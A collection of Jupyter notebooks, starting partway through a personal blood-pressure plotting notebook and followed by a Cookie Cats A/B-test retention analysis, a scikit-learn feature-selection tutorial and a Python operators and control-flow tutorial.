65, 63 ], [ "2019-01-17 09:18", 125, 65, 61 ], ]) df[0] = pd.to_datetime(df.time, format="%Y-%m-%d %H:%M:%S") df = df.set_index(0) # df = df.groupby(0).median() df = df.resample('30min').median().dropna() # df # df = df.rolling('1h').median() df.plot() # df.dropna() # type(df.set_index(0).index) # df['2019-01-09':] import matplotlib.cm as cm import numpy as np def plot_by_days(df): plt.figure(figsize=(8,4)) plt.grid() # print(df) groups = df.groupby(df.index.date) colors = cm.rainbow(np.linspace(0, 1, len(groups))) for c, (_, group) in zip(colors, groups): # plt.scatter(group.index.time, group[1], color=c, s=550, alpha=0.1 ) # plt.scatter(group.index.time, group[1], s=550, alpha=0.2 ) plt.scatter(group.index.time, group.sys, s=50, color=c ) plt.plot(group.index.time, group.sys, color=c, alpha=0.21, linewidth=3) # plt.plot(group.index.time, group[1] ) # to_plot = df #[25:65] to_plot = df['2019-01-10':] plot_by_days(to_plot) # to_plot from datetime import datetime # datetime(2018, 12, 31, 12, 0, 1).strftime("%Y-%m-%d %H:%M:%S") # print(df[1].describe()) # dir(df[1]) # df[1].quantile(0.95) import datetime nights = df[ (datetime.time(0,30) <= df.index.time) & (df.index.time <= datetime.time(2,30))] # print(nights[1].describe()) # print(nights[1].quantile(0.90)) nights.hist(); # TODO: # 1. Rolling mean over days # 2. Rolling std() over days def plot_range(label, df, resample='1d', rolling='1d', c='blue'): mean = df.resample(resample).mean().rolling(rolling).mean(); std = df.resample(resample).std().rolling(rolling).mean(); mins = df.resample(resample).min().rolling(rolling).mean(); maxes = df.resample(resample).max().rolling(rolling).mean(); # plt.figure(figsize=(16,8)) # plt.axes() plt.title(label=label) plt.grid() # plt.box() plt.plot(mean-std, c=c) plt.plot(mean+std, c=c) plt.plot(mins, c="light"+c) plt.plot(maxes, c="light" + c) # plt.plot(std) plt.figure(figsize=(16,8)) plt.subplot(221) plot_range('Sys', df.sys) plt.subplot(222) plot_range('Dia', df.dia) plt.subplot(223) plot_range('Pulse pressure', df.sys-df.dia) plt.subplot(224) plot_range('Rate', df.rate) plt.show() # plot_range(df.dia, c='green') # plot_range(df.rate) df.resample('1d').mean().plot(title="mean"); df.rolling('1d').std().rolling('1d').mean().plot(title="std"); nights.sys.hist(); plt.hist(df.sys); plt.hist(df.dia); # plt.show() ``` # TODO: 1. Embulance staff questions:: what's min/max pressure during the last week? 2. Refactor the whole notebook as a function, to make it posssible to analyze different data sets quickly (so to understand the benefits from different medical approaches, dozes, so on).. 3. A function like: ```python should_i_call_embulance_right_now(current_systolic, current_diastolic, current_heartrate) True/False ``` Also need to explain in the docs, probably, that an embulance in some countries is free (for instance in Russia) and what it does exactly (magnesium injection) and, in some countries, - pretty expensive (the US). ``` # 2019-01-14 - поменял расписание приёма таблеток ```
github_jupyter
## 1. Of cats and cookies <p><a href="https://www.facebook.com/cookiecatsgame">Cookie Cats</a> is a hugely popular mobile puzzle game developed by <a href="http://tactile.dk">Tactile Entertainment</a>. It's a classic "connect three"-style puzzle game where the player must connect tiles of the same color to clear the board and win the level. It also features singing cats. We're not kidding! Check out this short demo:</p> <p><a href="https://youtu.be/GaP5f0jVTWE"><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/cookie_cats_video.jpeg" style="width: 500px"></a></p> <p>As players progress through the levels of the game, they will occasionally encounter gates that force them to wait a non-trivial amount of time or make an in-app purchase to progress. In addition to driving in-app purchases, these gates serve the important purpose of giving players an enforced break from playing the game, hopefully resulting in that the player's enjoyment of the game being increased and prolonged.</p> <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/cc_gates.png" alt=""></p> <p>But where should the gates be placed? Initially the first gate was placed at level 30, but in this notebook we're going to analyze an AB-test where we moved the first gate in Cookie Cats from level 30 to level 40. In particular, we will look at the impact on player retention. But before we get to that, a key step before undertaking any analysis is understanding the data. So let's load it in and take a look!</p> ``` # Importing pandas import pandas as pd # Reading in the data df = pd.read_csv('datasets/cookie_cats.csv') # Showing the first few rows df.head() ``` ## 2. The AB-test data <p>The data we have is from 90,189 players that installed the game while the AB-test was running. The variables are:</p> <ul> <li><code>userid</code> - a unique number that identifies each player.</li> <li><code>version</code> - whether the player was put in the control group (<code>gate_30</code> - a gate at level 30) or the group with the moved gate (<code>gate_40</code> - a gate at level 40).</li> <li><code>sum_gamerounds</code> - the number of game rounds played by the player during the first 14 days after install.</li> <li><code>retention_1</code> - did the player come back and play <strong>1 day</strong> after installing?</li> <li><code>retention_7</code> - did the player come back and play <strong>7 days</strong> after installing?</li> </ul> <p>When a player installed the game, he or she was randomly assigned to either <code>gate_30</code> or <code>gate_40</code>. As a sanity check, let's see if there are roughly the same number of players in each AB group. </p> ``` # Counting the number of players in each AB group. df.groupby('version')['version'].count() df.head() ``` ## 3. The distribution of game rounds <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/mr_waffles_smiling.png" style="width:200px; float:left"> </p> <p>It looks like there is roughly the same number of players in each group, nice!</p> <p>The focus of this analysis will be on how the gate placement affects player retention, but just for fun: Let's plot the distribution of the number of game rounds players played during their first week playing the game.</p> ``` # This command makes plots appear in the notebook %matplotlib inline # Counting the number of players for each number of gamerounds plot_df = df.groupby('sum_gamerounds')['userid'].count() # Plotting the distribution of players that played 0 to 100 game rounds ax = plot_df.head(100).plot(x='sum_gamerounds', y='userid') ax.set_xlabel("sum_gamerounds") ax.set_ylabel("userid") ``` ## 4. Overall 1-day retention <p>In the plot above we can see that some players install the game but then never play it (0 game rounds), some players just play a couple of game rounds in their first week, and some get really hooked!</p> <p>What we want is for players to like the game and to get hooked. A common metric in the video gaming industry for how fun and engaging a game is <em>1-day retention</em>: The percentage of players that comes back and plays the game <em>one day</em> after they have installed it. The higher 1-day retention is, the easier it is to retain players and build a large player base. </p> <p>As a first step, let's look at what 1-day retention is overall.</p> ``` # The % of users that came back the day after they installed df['retention_1'].sum()/df['retention_1'].count() ``` ## 5. 1-day retention by AB-group <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/belle_cookie.png" style="width:200px; float:right"> </p> <p>So, a little less than half of the players come back one day after installing the game. Now that we have a benchmark, let's look at how 1-day retention differs between the two AB-groups.</p> ``` # Calculating 1-day retention for each AB-group df.groupby('version')['retention_1'].sum()/df.groupby('version')['retention_1'].count() ``` ## 6. Should we be confident in the difference? <p>It appears that there was a slight decrease in 1-day retention when the gate was moved to level 40 (44.2%) compared to the control when it was at level 30 (44.8%). It's a small change, but even small changes in retention can have a large impact. But while we are certain of the difference in the data, how certain should we be that a gate at level 40 will be worse in the future?</p> <p>There are a couple of ways we can get at the certainty of these retention numbers. Here we will use bootstrapping: We will repeatedly re-sample our dataset (with replacement) and calculate 1-day retention for those samples. The variation in 1-day retention will give us an indication of how uncertain the retention numbers are.</p> ``` # Creating an list with bootstrapped means for each AB-group boot_1d = [] for i in range(500): boot_mean = df.sample(frac=1, replace=True).groupby('version')['retention_1'].mean() boot_1d.append(boot_mean) # Transforming the list to a DataFrame boot_1d = pd.DataFrame(boot_1d) # A Kernel Density Estimate plot of the bootstrap distributions boot_1d.plot() ``` ## 7. Zooming in on the difference <p>These two distributions above represent the bootstrap uncertainty over what the underlying 1-day retention could be for the two AB-groups. Just eyeballing this plot, we can see that there seems to be some evidence of a difference, albeit small. Let's zoom in on the difference in 1-day retention</p> <p>(<em>Note that in this notebook we have limited the number of bootstrap replication to 500 to keep the calculations quick. In "production" we would likely increase this to a much larger number, say, 10 000.</em>)</p> ``` # Adding a column with the % difference between the two AB-groups boot_1d['diff'] = (boot_1d['gate_30'] - boot_1d['gate_40']) / boot_1d['gate_40'] * 100 # Ploting the bootstrap % difference ax = boot_1d['diff'].plot() ax.set_xlabel("Not bad not bad at all!") ``` ## 8. The probability of a difference <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/ziggy_smiling.png" style="width:200px; float:left"> </p> <p>From this chart, we can see that the most likely % difference is around 1% - 2%, and that most of the distribution is above 0%, in favor of a gate at level 30. But what is the <em>probability</em> that the difference is above 0%? Let's calculate that as well.</p> ``` # Calculating the probability that 1-day retention is greater when the gate is at level 30 prob = (boot_1d['diff'] > 0).sum() / len(boot_1d['diff']) # Pretty printing the probability print(prob) ``` ## 9. 7-day retention by AB-group <p>The bootstrap analysis tells us that there is a high probability that 1-day retention is better when the gate is at level 30. However, since players have only been playing the game for one day, it is likely that most players haven't reached level 30 yet. That is, many players won't have been affected by the gate, even if it's as early as level 30. </p> <p>But after having played for a week, more players should have reached level 40, and therefore it makes sense to also look at 7-day retention. That is: What percentage of the people that installed the game also showed up a week later to play the game again.</p> <p>Let's start by calculating 7-day retention for the two AB-groups.</p> ``` # Calculating 7-day retention for both AB-groups df.groupby('version')['retention_7'].sum()/df.groupby('version')['retention_7'].count() ``` ## 10. Bootstrapping the difference again <p>Like with 1-day retention, we see that 7-day retention is slightly lower (18.2%) when the gate is at level 40 than when the gate is at level 30 (19.0%). This difference is also larger than for 1-day retention, presumably because more players have had time to hit the first gate. We also see that the <em>overall</em> 7-day retention is lower than the <em>overall</em> 1-day retention; fewer people play a game a week after installing than a day after installing.</p> <p>But as before, let's use bootstrap analysis to figure out how certain we should be of the difference between the AB-groups.</p> ``` # Creating a list with bootstrapped means for each AB-group boot_7d = [] for i in range(500): boot_mean = df.sample(frac=1, replace=True).groupby('version')['retention_7'].mean() boot_7d.append(boot_mean) # Transforming the list to a DataFrame boot_7d = pd.DataFrame(boot_7d) # Adding a column with the % difference between the two AB-groups boot_7d['diff'] = (boot_7d['gate_30'] - boot_7d['gate_40']) / boot_7d['gate_40'] * 100 # Ploting the bootstrap % difference ax = boot_7d['diff'].plot() ax.set_xlabel("% difference in means") # Calculating the probability that 7-day retention is greater when the gate is at level 30 prob = (boot_7d['diff'] > 0).sum() / len(boot_7d['diff']) # Pretty printing the probability print(prob) ``` ## 11. The conclusion <p>The bootstrap result tells us that there is strong evidence that 7-day retention is higher when the gate is at level 30 than when it is at level 40. The conclusion is: If we want to keep retention high — both 1-day and 7-day retention — we should <strong>not</strong> move the gate from level 30 to level 40. There are, of course, other metrics we could look at, like the number of game rounds played or how much in-game purchases are made by the two AB-groups. But retention <em>is</em> one of the most important metrics. If we don't retain our player base, it doesn't matter how much money they spend in-game.</p> <p><img src="https://s3.amazonaws.com/assets.datacamp.com/production/project_184/img/cookie_yellow.png" style="width:100px; float:center"> </p> <p>So, why is retention higher when the gate is positioned earlier? One could expect the opposite: The later the obstacle, the longer people are going to engage with the game. But this is not what the data tells us. The theory of <em>hedonic adaptation</em> can give one explanation for this. In short, hedonic adaptation is the tendency for people to get less and less enjoyment out of a fun activity over time if that activity is undertaken continuously. By forcing players to take a break when they reach a gate, their enjoyment of the game is prolonged. But when the gate is moved to level 40, fewer players make it far enough, and they are more likely to quit the game because they simply got bored of it. </p> ``` # So, given the data and the bootstrap analysis # Should we move the gate from level 30 to level 40 ? move_to_level_40 = False # True or False ? ```
github_jupyter
# Feature Selection * ` skelearn.feaeture_selection ` module can be used for feature selection / dimensionality reduction. * This helps to imporve the accuracy score or performance while dealing with large dimensional data. https://scikit-learn.org/stable/modules/feature_selection.html ## Removing features with low variance * Variance thresholding method can be used to remove features having low variance. * Set a particular variance threshold for a given attribute. * ` VarianceThreshold ` will remove the column having variance less than the given threshold. * By default ` VarianceThreshold ` removes the columns having zero variance. ``` from sklearn.feature_selection import VarianceThreshold X = [[0,0,1], [0,1,0], [1,0,0], [0,1,1], [0,1,0], [0,1,1]] sel = VarianceThreshold(threshold = 0.16) sel.fit_transform(X) ``` ## Univariate Feature Selection * Univariate Feature Selection works by considering statistical tests. * It is prepreocessing step before estimator * Use the ` SelectBest ` and apply ` fit_transform ` * ` Select_best ` removes all the ` k ` highest scoring features * ` SelectPercentile ` removes all but a user-specified highest scoring percentage of feature. * Using common univariate statistical tests for each feature: false positive rate ` SelectFpr `, false discovery rate ` SelectFdr `, or famaily wise error ` SelectFwe ` * Let us perform $ \chi^2 $ test to the samples to retrieve only the two best features ``` from sklearn.datasets import load_iris from sklearn.feature_selection import SelectKBest from sklearn.feature_selection import chi2 iris = load_iris() X, y = iris.data, iris.target print(X.shape) SB = SelectKBest(chi2, k=2) X_new = SB.fit_transform(X,y) print(X_new.shape) ``` * These objects take input a scoring function and return univariate scores or p-values * Some guidelines: - * For regresiion: - `f_regrssion` , ` mutual_info_regression ` * For classification: - ` chi2 ` , ` f_classif `, ` mutual_info_classif ` * The methods based on F-test estimate the degree of linear dependency between two random varaibles. * Mututal information methods can capture any kind of statistical dependency, but they are non parametric and require more samples for accurate estimation ## Recursive Feature Elimination * Given an external estimator that assigns weights to features, recursive feature elimination is to select features by recursively considering smaller and smaller sets of features. * First, the estimator is trained on the inital set of features and the importance of the features is obtained using the ` coef_ ` method or through the ` feature_importances_ ` attribute. * Then, the least important features are pruned from current set of features. * This procedure is repeated on the pruned set unitil the desired number of features to be selected are eventually reached. ### E.g. Recursive feature elimination ``` from sklearn.datasets import make_friedman1 from sklearn.feature_selection import RFE from sklearn.svm import SVR X,y = make_friedman1(n_samples = 50, n_features=10, random_state = 0) estimator = SVR(kernel = 'linear') print(X.shape) # The classifier must support the coef_ or feature_importances_ attributes # Estimator denotes the estimator which we are using # n_feaures denotes the maximum number of features that we are want to choose # step denotes the amount of features to be removed at end of every iteration selector = RFE(estimator, n_features_to_select= 5, step=1) selector = selector.fit(X,y) # Use selector.support_ do display the mask of features, that is which features were selected print(selector.support_) # Use selectior.ranking_ to correspond to the ranking of the ith position of the feature # Best features are ranked as 1 print(selector.ranking_) ``` ### E.g. Recursive feature elimination using cross-validation Feature ranking using cross-validation selection of best number of features ``` from sklearn.datasets import make_friedman1 from sklearn.feature_selection import RFECV from sklearn.svm import SVR X, y = make_friedman1(n_samples = 50, n_features = 10, random_state=0) estimator = SVR(kernel = 'linear') # cv denotes number of times we do cross_validation selector = RFECV(estimator, min_features_to_select=5, cv = 5) selector = selector.fit(X,y) selector.support_ selector.ranking_ ``` ## Feature selection using SelectFromModel * ` SelectFromModel ` is a meta-transformer that helps can be used with any estimator having ` coef_ ` or ` features_importance_ ` attribute after fitting. * The features are considered unimportant are removed, if the corresponding `coef_` or ` features_importance_ ` values are below the providied ` threshold ` parameter. * Apart from specifying the threshold numerically, there are built-in hueristics for finding for finding a threshold using a string argument such as "mean", "mode" or "median". ### L1-based feature Selection * Linear models penalized with L1 norm have sparse solutions. * When the goal is to reduce the dimensionality of the data to use with another classifier then they can be used along with the ` feature_selection.SelectFromModel ` to select the non-zero coefficients. * In particular, sparse estimators useful for this purpose are the 1 ` linear_model.Lasso ` for regression, and of ` linear_model.LogisticRegression `and ` svm.LinearSVC ` for classification ``` from sklearn.svm import LinearSVC from sklearn.datasets import load_iris from sklearn.feature_selection import SelectFromModel iris = load_iris() X,y = iris.data, iris.target print(X.shape) lsvc = LinearSVC(C = 0.01, penalty = "l1", dual = False, max_iter = 2500) lsvc = lsvc.fit(X,y) # Estimator contains the name of estimator we are trying to fit # Whether a prefit model is expected to be passed into the constructor directly or not. # If True, transform must be called directly and SelectFromModel cannot be used with cross_val_score, # GridSearchCV and similar utilities that clone the estimator. # Otherwise train the model using fit and then transform to do feature selection. model = SelectFromModel(lsvc, prefit = True) X_new = model.transform(X) print(X_new.shape) ``` * With SVMs and logistic-regression, the parameter C controls the sparsity: the smaller C the fewer features selected. * With Lasso, the higher the alpha parameter, the fewer features selected. ### Tree-based feature Selection * Tree-based estimator can be used to compute the feature importances which in turn can be used to dicared the irrelevant features ``` from sklearn.ensemble import RandomForestClassifier from sklearn.datasets import load_iris from sklearn.feature_selection import SelectFromModel iris = load_iris() X, y = iris.data, iris.target print(X.shape) clf = RandomForestClassifier(n_estimators=100, n_jobs = -1, random_state=0) clf = clf.fit(X,y) clf.feature_importances_ model = SelectFromModel(clf, threshold = 0.3, prefit = True) X_new = model.transform(X) print(X_new.shape) ``` ## Feature Selection as Part of ML Pipeline * Feature selection is usually used as a prepreocessing step before doing actual learning. * Recommended way to do this is use ` sklearn.pipeline.Pipeline ` ``` from sklearn.pipeline import Pipeline clf = Pipeline([ ('feature_selection', SelectFromModel(LinearSVC(max_iter = 8000))), ('classification', RandomForestClassifier(n_estimators = 100)) ]) clf = clf.fit(X,y) ``` * In this snippet we make use of `sklearn.svm.LinearSVC` with ` SelectfromModel `. * ` SelectfromModel ` selects the important feature and passes it to `RandomForestClassifier`. * `RandomForestClassifer` trains only on the relevant input given by the pipeline
github_jupyter
# <center>Python Basics<center/> <img height="60" width="120" src="https://www.python.org/static/img/python-logo-large.png?1414305901"></img> # Table of contents <br/> <a href = "#12.-Operators">12. Operators</a><br/> 1. Arithmetic operators 2. Comparison (Relational) operators 3. Logical (Boolean) operators 4. Bitwise operators 5. Assignment operators 6. Special operators <a href = "#13.-Control-Flow">13. Control Flow</a><br/> 1. if..else 2. while 3. for 4. break & continue # 12. Operators Operators are the constructs which can help manipulate the value of operands.<br/> Consider the expression 4 + 5 = 9. Here, <i><b>4 and 5</b></i> are called <i><b>operands</b></i> and <i><b>+</b></i> is called <i><b>operator</b></i>. ## Operator Types The different operators in Python are as below 1. Arithmetic operators 2. Comparison (Relational) operators 3. Logical (Boolean) operators 4. Bitwise operators 5. Assignment operators 6. Special operators Let us discuss them one by one ## 12.1 Arithmetic Operators Arithmetic operators are used to perform mathematical operations like addition, subtraction, multiplication etc. + , -, *, /, %, //, ** are arithmetic operators Example: ``` variable1, variable2 = 5, 2 print(variable1 + variable2) # Addition(+) print(variable1 - variable2) # Subtraction(-) print(variable1 * variable2) # Multiplication(*) print(variable1 / variable2) # Division(/) print(variable1 % variable2) # Modulo division (%) print(variable1 // variable2) # Floor Division (//) print(variable1 ** variable2) # Exponent (**) ``` ## 12.2 Comparision Operators Comparison operators are used to compare values. It either returns True or False according to the condition. >, <, ==, !=, >=, <= are comparision operators ``` variable1, variable2 = 5, 2 print(variable1 < variable2) # Check if variable1 is less than variable2 print(variable1 > variable2) # Check if variable1 is greater than variable2 print(variable1 == variable2) # Check if variable1 is equal to variable2 print(variable1 != variable2) # Check if variable1 is not equal to variable2 (!=) print(variable1 >= variable2) # Check if variable1 greater than or equal to variable2 print(variable1 <= variable2) # Check if variable1 less than or equal to variable2 ``` ## 12.3 Logical Operators Logical operators are **and, or, not** operators. ``` variable1, variable2 = True, False print(variable1 and variable2) # Print variable1 and variable2 # 0 0 0 # 0 1 0 # 1 0 0 # 1 1 1 print(variable1 or variable2) # Print variable1 or variable2 # 0 0 0 # 0 1 1 # 1 0 1 # 1 1 1 print(not variable2) # Print not variable2 ``` ## 12.4 Bitwise operators Bitwise operators act on operands as if they were string of binary digits. It operates bit by bit &, |, ~, ^, >>, << are Bitwise operators ``` variable1, variable2 = 3, 7 # Decimal to bitwise values -> 3 - 0000 0011 & 7 - 0000 0111 print(variable1 & variable2) # Bitwise AND -> 0000 0011 & 0000 0111 -> 0000 0011 -> 3 print(variable1 | variable2) # Bitwise OR -> 0000 0011 | 0000 0111 -> 0000 0111 -> 7 print(~variable2) # Bitwise NOT -> ~ 0000 0111 -> 1111 1000 -> -8 print(variable1 ^ variable2) # Bitwise XOR -> 0000 0011 ^ 0000 0111 -> 0000 0100 -> 4 print(variable1>>2) # Bitwise rightshift 0000 0011>>2 -> 0000 0000 -> 0 print(variable1<<2) # Bitwise Leftshift 0000 0011<<2 -> 0000 1100 -> 12 ``` ## 12.5 Assignment operators <u>Assignment operators</u> are used in Python to <i><b>assign values to variables</b></i>. age = 50 is a simple assignment operator that assigns the value 50 on the right to the variable (age) a on the left. =, +=, -=, *=, /=, %=, //=, **=, &=, |=, ^=, >>=, <<= are Assignment operators ``` age = 40 age += 4 # Add AND <- age = age + 4 print(age) age -= 7 # Subtract AND (-=) print(age) age *= 4 # Multiply AND (*=) print(age) age /= 4 # Divide AND (/=) print(age) age %= 20 # Modulus AND (%=) print(age) age //= 4 # Floor Division (//=) print(age) age **= 4 # Exponent AND (**=) print(age) ``` ## 12.6 Special Operators ### 12.6.1 Identity Operators **is and is not** are the <u>identity operators</u> in Python. They are used to verify if two values (or variables) are located in the same part of the memory. ``` variable1 = 20 variable2 = 20 print(variable1 is variable2) # 20 is created once & both variable1 and variable2 points to same object #check is not print(variable1 is not variable2) myList1 = [1,2,3] myList2 = [1,2,3] print(myList1 is myList2) myString1 = "Suchit" myString2 = "Suchit" print(myString1 is not myString2) ``` ### 12.6.2 MemberShip Operators **in and not in** are the membership operators in Python. They are used to test whether a value or variable is found in a sequence (string, list, tuple, set and dictionary). ``` myList3 = ['a', 22, 'b', 100] print(22 in myList3) # Check if 22 is present in the given list or not print('b' in myList3) # Check if 'b' is present in the given list myDictionary = {125 : 'Apple', 200 : 'Banana'} print(125 in myDictionary) ``` # 13. Control Flow ## 13.1 Python if - else Statement If - else statements are used for **decision making**, let us see a simple examle, if 'It rains':<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> else: <br/> &nbsp;&nbsp;&nbsp;&nbsp;if 'It is too hot':<br/> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> &nbsp;&nbsp;&nbsp;&nbsp;else:<br/> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Play golf'<br/> --- **else if** can be combined to form **elif** if 'It rains':<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> elif 'It is too hot':<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Dont play golf'<br/> else:<br/> &nbsp;&nbsp;&nbsp;&nbsp;'Play golf'<br/> --- ### 13.1.1 Let us see the Python Syntax for if statement<br/><br/> if test expression: statement(s) --- <br/><br/> The program evaluates the test expression and will execute statement(s) only if the text expression is True. If the text expression is False, the statement(s) is not executed. Python interprets non-zero values as True. None and 0 are interpreted as False. --- #### Flow Chart on how if-statement helps in Decision Making <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/Python_if_statement.jpg?raw=true"></img> #### Examples of if-statement ``` number = 20 if number<15: print('Number is less than 15') print('Outside if block') # try 0, -1 and None if -1: print("Inside if") print("Outside if") #This print statement always print # What is the idea behind the above val = -1 print(bool(val)) ``` --- ### 13.1.2 Python if...else - Statement Syntax of if ... else statement is as follows if test expression: Body of if else: Body of else ### Flow Chart on how if...else-statement helps in Decision Making <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/flowchart-if-else-programming.jpg?raw=true"></img> #### Examples of if...else-statement ``` age = 21 if age > 18: print('Adult') else: print('Child') ``` --- ### 13.1.3 if..elif..else Statement The syntax for **if..elif..else** Statement is as follows if test expression: Body of if elif test expression: Body of elif else: Body of else #### Flow Chart on how if..elif..else-statement helps in Decision Making <img height="200" width="500" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/python_ifelseif.jpg?raw=true"></img> ``` age = 20 if age > 19: print('Adult') elif age > 12: print('Teen') else: print('Child') ``` --- ### 13.1.4 Nested if Statements We can have a if...elif...else statement inside another if...elif...else statement. This is called nesting in computer programming. Any number of these statements can be nested inside one another. Indentation is the only way to figure out the level of nesting. This can get confusing, so must be avoided if we can. #### Example of <b>Nested if</b> statements ``` age = 14 if age >=13: if age <=19: print('Teen') else: print('Adult') else: print('Child') print('This will always get executed') ``` Combining **Operators** in if-statements ``` age = 1 person_type = 'not sure' if (age >= 13) and (age<=19): # Using the logical operator : and person_type = 'Teen' elif (age >= 0) and (age <=12): person_type = 'Child' else: person_type = 'Adult' print('The person is in category: {}'.format(person_type)) ``` --- # 13.2 <u>while</u> loop in Python ## 13.2.1 while loop Use while loop to iterate over a block of code as long as the test expression (also called test condition) is true. #### Syntax while test_expression: Body of while The body of the loop is entered only if the test_expression evaluates to True. After one iteration, the test expression is checked again. This process continues until the test_expression evaluates to False. #### Flowchart of <u>while</u> loop <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/while_0.png?raw=true"></img> #### Examples of while loop ``` # Find the sum of all numbers in a list myList = [1, 2, 3, 4, 5] sum = 0 index = 0 while index < len(myList): sum += myList[index] # sum = sum + myList[index] index += 1 # index = index + 1 print('Sum of the array is: {}'.format(sum)) ``` #### Examples of while Loop with else statement While loop has an optional <b>else</b> block which one may use if one wishes to use it.<br/> The else block gets executed when the condition in while statement is <b>False</b>.<br/> The <b>else</b> can be skipped if we use a <b>break</b> command in the while block ``` myList = [1, 2, 3, 4, 5] #iterating over the list index = 0 while index < len(myList): print(myList[index]) break index += 1 else: print('Completed iterating the list') print('Eitherway printed') ``` #### Example: Calculate the factorial of a number ``` userInput = input("Enter a positive non-zero number: ") number = int(userInput) if number <= 0: print('Invalid number please re-enter') userInput = input("Enter a positive non-zero number: ") number = int(userInput) else: print('Thank you, let me share the result with you') fact = 1 if number > 0: while number > 0: fact *= number # fact = fact * number number -= 1 # number = number -1 print('The factorial of the number is: ', fact) ``` --- # 13.3 <u>for</u> Loop Python <b>for</b> loop in one of the most often used Python looping technque to iterate over a sequence (list, tuple, string) or other iterable objects. Iterating over a sequence is called traversal. #### Syntax: for element in sequence : 'for' code block Here, element is the variable that takes the value of the item inside the sequence on each iteration. Loop continues until we reach the last item in the sequence. #### Flowchart of <u>for</u> loop <img height="200" width="400" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/for_0.png?raw=true"></img> ``` # Sum of all numbers in a list myList = [1, 2, 3, 4, 5] sum = 0 #iterating over the list for element in myList: sum += element print("Sum of the aray is: {}".format(sum)) ``` #### range() function Often we need to run a for loop on a range of values that could be based on a starting point to an ending point with pre-specified step size. ##### range(start,stop,step size) The numbers in range are not stored but calculated dynamically on the fly using the 3 parameters start,stop, step size ``` # Print range of 5 for element in range(5): print(element) # Print range numbers from 0 to 40 but with step size of 12 for element in range(1,40,3): print(element) myList = [1, 2, 3, 4, "suchit"] # Iterate over myList using index #for index in range(len(myList)): # print(myList[index]) for element in myList: print(element) ``` #### for loop with else Similar to while loop, a for loop can have an optional else block. <br/> The else part is executed if the items in the sequence used in for loop exhausts. for loop's else part runs if no break occurs. ``` names = ['Suchit', 'Rakesh', 'Roshni'] #iterating over the list for name in names: print(name) else: print("Completed the names list") # Let us use the break keyword for name in names: print(name) if name == 'Rakesh': break else: print("Completed the names list") print('Totally outside the for else block') ``` #### Example: Program to calculate the divisors of number ``` inputNumber = input("Please enter a positive number: ") number = int(inputNumber) listOfDivisors = [1] for divisor in range(2,int(number/2)+1): # divisor -> 2.3.4.5.6.7.8....... int(num/2) + 1 if(number%divisor == 0): listOfDivisors.append(divisor) else: print(listOfDivisors) ``` --- # 13.4 <u>break & continue</u> in Python The break and continue statements can alter the flow of a normal loop. Loops iterate over a block of code until test expression is false, but sometimes we may need to terminate the current iteration or even the whole loop without cheking test expression. The break and continue statements are used in these cases. #### Python break Statement Syntax: break #### Python continue Statement syntax: continue #### Flowchart of <u>break and continue</u> loop <table width=100%> <tr><th align="center"><h2>break</h2></th><th align="center"><h2>continue</h2></th></tr> <tr><td><img height="260" width="300" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/break.jpg?raw=true"></img></td><td><img height="260" width="380" src="https://github.com/suchitmajumdar/LearnPython/blob/master/images/continue.jpg?raw=true"></img></td> </tr> </table> #### Examples of break and continue ``` # Use of break names = ['Suchit', 'Rakesh', 'Roshni'] for name in names: # Let us iterate over the names list if name == 'Rakesh': break print(name) else: print('For is completed and we are in else part') print("Totally outside the for & else loop") # Use of continue names = ['Suchit', 'Rakesh', 'Roshni'] for name in names: # Let us iterate over the names list if name == 'Rakesh': continue print(name) # If continue condition is satisfied we skip this line and carry on with the next iteration else: print('For is completed and we are in else part') print("Totally outside the for & else loop") ``` #### Example: First 3 divisors of a number except 2 & 3 ``` inputNumber = input("Please enter a positive number: ") number = int(inputNumber) listOfDivisors = [1] for divisor in range(2,int(number/2)+1): if number%divisor == 0: if divisor in [2,3]: continue elif len(listOfDivisors) == 3: break listOfDivisors.append(divisor) print(listOfDivisors) ```
github_jupyter